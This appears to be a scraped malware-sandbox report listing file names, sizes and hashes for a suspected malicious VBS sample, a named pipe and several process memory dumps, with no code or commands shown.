b7287935a2b676948efe0737fe8cc8ec33c28d5f17afcb2b6d937614c412116e5a592e09df9fcc0eefdbe8d0ec35efb9e16f42f37d07af45e29d6a8bab975089

Download Submit
C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs

Filesize
8.9MB

MD5
8a2d34358cdf0310de64d65bf588b82c

SHA1
ac292dc90aebabdca58eced58c7bcd842bd4bcb4

SHA256
506f1e84634fa1bdd3522473a714f6f8b8aec4033c23a23cd88882a1ab61591a

SHA512
b1dd5736da8a75191bf0058c93a975ba54a65c05bace3e515152432c9c64e316c7b970405c9ecfe45cbfdbc385d36c06ef66786506da377fdd2fe56ab22b7dda

Download Submit
\??\pipe\LOCAL\crashpad_1404_VDIAHMITQHPEJKCP

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/4152-111-0x0000000006030000-0x00000000065D4000-memory.dmp

Filesize
5.6MB

Download
memory/4152-110-0x00000000059E0000-0x0000000005A7C000-memory.dmp

Filesize
624KB

Download
memory/4152-112-0x0000000005AF0000-0x0000000005B56000-memory.dmp

Filesize
408KB

Download
memory/4152-104-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4704-103-0x000002214C2A0000-0x000002214C2AA000-memory.dmp

Filesize
40KB

Download
memory/4704-102-0x000002214C290000-0x000002214C29A000-memory.dmp

Filesize
40KB

Download
memory/5072-83-0x00000238401D0000-0x00000238401F2000-memory.dmp

Filesize
136KB

Download